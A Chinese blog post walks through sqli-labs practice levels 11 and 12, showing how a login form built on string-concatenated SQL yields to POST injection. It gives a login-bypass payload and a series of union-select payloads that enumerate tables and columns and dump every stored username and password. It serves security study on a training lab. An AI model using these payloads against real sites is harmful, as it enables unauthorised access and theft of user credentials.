【Less-11/12】POST注入之用户登录

最新推荐文章于 2022-12-06 09:07:49 发布
最新推荐文章于 2022-12-06 09:07:49 发布
阅读量392 收藏 1
点赞数
分类专栏: SQL注入总结 文章标签: mysql 数据库 sql post注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44032232/article/details/109448122
版权

文章目录

一、测试注入点

测试username是否存在sql注入:

正常输入用户名和密码提交后url没有变化,【POST请求】

在这里插入图片描述
由上图所示存在字符型注入。

同理测试password是否存在sql注入

二、抓包查看请求参数

查看POST请求中需要的请求参数

在这里插入图片描述
这里我将执行后的sql语句直接打印在页面上了。

源码:

@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
三、万能密码登录

正常登录的请求参数:

uname=admin&passwd=admin&submit=Submit

在这里插入图片描述
注意:在测试注入点的时候也可以直接在请求参数中加单引号进行测试,如下图所示:

在这里插入图片描述
万能密码登录:

uname=admin' or '1'='1' #&passwd=1&submit=Submit

在这里插入图片描述

SELECT username, password FROM users WHERE username='admin' or '1'='1' #' and password='1' LIMIT 0,1
四、构造注入语句
1、判断字段数
uname=admin' order by 2 #&passwd=1&submit=Submit

在这里插入图片描述
该表中有两个字段

2、查看回显
uname=-admin' union select 1,2 #&passwd=1&submit=Submit

在这里插入图片描述

3、查看当前数据库和当前用户
uname=-admin' union select database(),user() #&passwd=1&submit=Submit

在这里插入图片描述

4、查看当前数据库所有表
uname=-admin' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()) #&passwd=1&submit=Submit

在这里插入图片描述

5、查看users表的列名、
uname=-admin' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users') #&passwd=1&submit=Submit

在这里插入图片描述
有三个字段:id username password

6、查看用户名和密码
uname=-admin' union select 1,(select group_concat(concat_ws(' ',username,password)) from users) #&passwd=1&submit=Submit

这里我先用concat_ws以空格连接,在用group_concat

在这里插入图片描述

第12关和11关同理,闭合符号不同,换成双引号+括号

uname=-admin") union select 1,2 #&passwd=1&submit=Submit

在这里插入图片描述

多学点技术
关注
专栏目录
POST注入
monkey:的博客
10-25 1978
POST注入 一、POST注入介绍 注入攻击的本质是把用户输入的数据当做代码执行,POST注入一般会在表单的地方。 1.有两个关键条件: ①用户能够控制输入 ②原本程序要执行的代码拼接了用户输入的数据 2.POST注入高位点: 登录框 查询框 各种和数据库有交互的框 3.最经典的POST注入莫过于万能密码: ’or 1=1 # 万能密码就是引出注入手法,你在登录的时候输入什么都能登录 二、例题 例如第一题 首先我们查看源码 $sql = 'select *from user where username
Sqli-labs靶场第16关详解[Sqli-labs-less-16]自动化注入-SQLmap工具注入
最新发布
m0_73615178的博客
03-03 744
-batch当你需要以批处理模式运行 sqlmap,避免任何用户干预 sqlmap 的运行,可以强制使用--batch这个开关。这样,当 sqlmap 需要用户输入信息时,都将会以默认参数运行。由于这题是,所以先使用burp进行抓包,然后将数据包存入txt文件中打包 用-r 选择目标txt文件爆出当前主机名称。
POST 注入
晨辰.的博客
03-20 4035
POST 注入
POST注入/HEAD注入
cutjgh的博客
05-20 417
POST注入(本质是SQL注入POST注入就是使用POST进行传参的注入,本质上与GET注入没有任何区别,注入语句在各种框里 在真实站点上,POST注入比GET注入POST注入高入点: 登录框 查询框 等各种和数据库有交互的框 表单在有些时候是GET传参 HEAD注入 HEAD注入 抓取的包中User_Agent,Referer,X_FORWARDED_FOR等都可能存在注入 实际上头注入就是将请求头中的数据放入数据库当作命令执行 updatexml() 更新xml文档的函数(当然还有别的报错函数,
POST注入(一)
qq_45300786的博客
07-04 9187
POST(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-05/index.php 攻击流程:     1;判断是否存在sql注入漏洞。     2;判断网页存在字段数。     3;判断回显点。     4;获取信息。   测试开始:     测试目标获取管理员账号密码 GET/POST 区别: GET传参的数据有限,比较少 POST传参的数据可以比较大 可以达到很多效果 —— 文件上传 GET传参会经过URL编码 POST不会URL编码,比如注释符号:#的UR
【JDBC】----综合案例(账号密码登录SQL注入
swy2560666141的博客
12-06 2388
目录分享第二十一篇励志语录 一:账号密码登录1 创建user表1.1、创建一张用户表user,表的字段如下:1.2、向user表中插入两条数据:2 实现登录二、SQL注入2.1 SQL注入的效果的演示2.1.1 SQL注入代码2.1.2 SQL注入效果2.2 什么是SQL注入2.3 如何避免SQL注入三:PrepareStatement解决SQL注入(重要)3.1 PreparedStatement的应用3.1.1 参数标记3.1.2 动态参数绑定3.2 综合案例 id,用户编号,主键、自动增长。usern
sqli-labs学习笔记(四)less 11-14 post注入
闵行小鱼塘
09-07 531
继续学习sqli-labs,本篇是less11-14
sqli-labs Less-13/Less-14 POST Double Injection
bigblue00的博客
06-17 172
Less-11/Less-12 POST Error Based POST型基于错误的注入 Less-11单引号闭合,Less-12双引号闭合,下面以Less-11为例说明 1、页面情况 访问页面,发现是一个登陆窗口。 2、获取数据库信息 浏览器设置代理,先随便输入一些内容,打开Burpsuite进行拦截抓包 将拦截到的请求信息发送到Repeater 在uname=123后面加一个单引号,点击Send 查看右侧的响应信息,发现有提示语法错误的报错信息,说明单引号被带入到数据库进行执行了。此位置存在SQ
sqli-lab教程——Less-11 POST - Error Based - Single quotes- String (基于错误的POST型单引号字符型注入)
luosaierdadi的博客
07-09 250
模拟真实环境,我们作为Dump用户使用Dump密码登陆,可以看到以下 登陆成功此时打开hackbar选中post可以看到,已经自动载入的刚才提交的表单数据: 我刚测试了一下,hackbar提交uname=admin' and 1=2 --+&passwd=admin&submit=Submit作为post参数时,无论and后面是1=1还是1=2,都能登陆,不知道为什么,可能是提交的时候自动加了+号连接语句的问题。所以现在改用burpsuit,抓包修改参数。 输入admin admin 登陆,抓包,发送到re
sqli-labs Less-18/ Less-19 POST-Header Injection
bigblue00的博客
10-09 261
POST方式,头部 User-Agent: 注入 1. 页面分析 当登陆失败时,只会返回用户的IP地址及登陆失败的提示图。 当登陆成功时,会返回用户的IP地址、user-agent信息及登陆成功的提示图。 2. PHP代码分析 通过分析代码,Username, Password的参数进行了过滤,无法进行注入。 (详细说明请参考Less-17中的说明,https://blog.csdn.net/bigblue00/article/details/108221236 ) 代码中有插入语句: $insert=
SQL注入Post型提交方式的注入--免密登录
weixin_44029504的博客
04-29 1522
Post型提交方式的注入 POST提交,由于不在url中携带,所以借助工具burpsuit!!! SQL注入之万能密码 1)sql注入之万能用户名 注释法 //将密码注释掉 eg:用户名处 admin' # or 方法 eg:admin' or '1'='1 2)updata 3)insert—UA 以Less11为实例:实现免密登陆 方法一:使用注释法 1、在页面使用用户名和密码登陆(...
php中如何判断用户是否登录状态,如何判断用户是否已经登录
weixin_32268169的博客
03-10 1081
//discuz同服务器下无passport登陆整合方法//贡献:huozhe3136 QQ:2666556//假设discuz安装在网站根目录下的bbs/中//用法事例error_reporting(E_ALL);$path_bbs="bbs/";//请修改为你的论坛的相对路径$check_username="admin";//测试时这个用户名必须在论坛里也存在$check_password="...
post注入
quan9i的博客
01-04 5574
post注入sql-lab11-18)
03_SQL注入_数据类型&提交注入
qq_42171569的博客
04-24 2436
03_SQL注入_数据类型&提交注入 1.闭合符号型 网页开发中,常见的数据交互类型有数字型和字符串型,此外JSON作为一种以键值对进行数据交互的方式也大量出现在开发者的视野当中。数据类型不同的情况下,手工注入时需要根据不同的数据类型闭合符号,来达到判断注入的目的。考虑如下两段PHP代码 代码1: $id=$_GET['id']; $sql="SELECT * FROM users WHERE id=$id LIMIT 0,1"; $result=mysql_query($sql); $row =
特别详细的POST 注入 思路
热门推荐
qq_42097777的博客
04-08 1万+
post注入是通过对输入框进行传参,可以被带入数据库进行的查询 # 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询 1.查询是否有注入点 对输入框填入一些闭合的符号,看页面是否异常 例如: ’        "          ') &...
SQL注入post注入
游魂的博客
12-06 2028
Post注入: 一般存在搜索框或登入页面位置,需要用burp抓包查看。 可以看到post数据中nama表单传的值为hack 用hackbar插件post数据中将传的值后面输入单引号或and 或 order by测试 输入单引号报错,查不到任何数据,由此判断存在post注入。 由于测试的为搜索框所以测试语句为%%27%23,才能正常查询出数据 注意在hackbar中是需要url编码才可以。 确...
使用POST请求完成登陆
weixin_51992178的博客
09-03 2291
通过修改form标签的属性,现在我们点击登录按钮,会自动向后台发送一个POST请求,请求地址为当前地址+/login。配置完成后,在Servlet的init方法中编写Mybatis初始化代码,因为它只需要初始化一次。编写Mybatis的依赖和配置文件,创建一个表,用于存放我们用户的账号和密码。创建一个实体类以及Mapper来进行用户信息查询。先编写一个Servlet。完善一下登陆验证逻辑。
sqli-labs(11-17)
weixin_44178492的博客
10-25 164
第十一关(POST -Error Based - single quotes- string) POST型,那我们来看一下,所谓的POST型是个什么样子 进去一看,界面确实大有不同,变成了一个登录框,但是,没关系,其实本质都是一样的 做靶场,遇到不会的就先来代码审计,我们就拿第一关的代码来和这一关进行对比吧 第一关关键代码: if(isset($_GET['id'])) { $id=$_GET['id']; //这是获取参数的语句 -----------------------------------
php curl post 登录,利用Php的CURL POST提交表单登录实例详解_PHP教程
weixin_32635501的博客
03-11 317
/*模拟资源推送类2012-09-14 by POOY*/class TuisongPost{//用构造登陆认证function TuisongPost(){//存放COOKIE的文件global $cookie_jar;$this->cookie_jar = tempnam('./tmp','cookie');$url = "http://www.你的地址";$post_data = ar...
sqli-labs Less-7
08-28
SQLi-Labs是一个用于学习和练习SQL注入的在线平台,其中包含了多个不同的注入场景。Less-7是其中的一个场景,它主要讲解的是SQL注入的基础知识。 在Less-7中,我们需要通过注入来绕过登录认证,获取到管理员的权限。具体步骤如下: 1. 打开SQLi-Labs平台,并选择Less-7场景。 2. 在登录框中输入任意用户名和密码,然后点击登录按钮。 3. 拦截登录请求,使用Burp Suite等工具修改POST请求的参数。 4. 在密码字段中尝试注入Payload,例如:'or '1'='1。 5. 发送修改后的请求,查看服务器返回的响应。 6. 如果成功绕过认证,系统会显示管理员页面。 请注意,在实际应用中,SQL注入是一种严重的安全漏洞,攻击者可以利用它来执行恶意操作。因此,保护应用程序免受SQL注入攻击至关重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

多学点技术

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值